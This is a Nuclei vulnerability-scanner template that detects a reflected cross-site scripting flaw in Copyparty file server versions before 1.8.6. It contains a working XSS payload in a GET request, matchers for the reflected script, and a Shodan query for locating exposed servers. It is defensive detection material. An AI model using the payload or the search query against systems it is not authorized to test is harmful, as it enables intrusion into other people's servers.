nuclei-templates/http/vulnerabilities/copyparty-xss.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2023-10-11 08:37:29 +00:00
id: copyparty-xss
info:
name: Copyparty v1.8.6 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/9001/copyparty/security/advisories/GHSA-cw7j-v52w-fp5r
metadata:
verified: true
max-request: 1
shodan-query: title:"copyparty"
tags: copyparty,xss,unauthenticated
http:
- method: GET
path:
- "{{BaseURL}}/?hc=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="/"><script>alert(document.domain);</script>'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200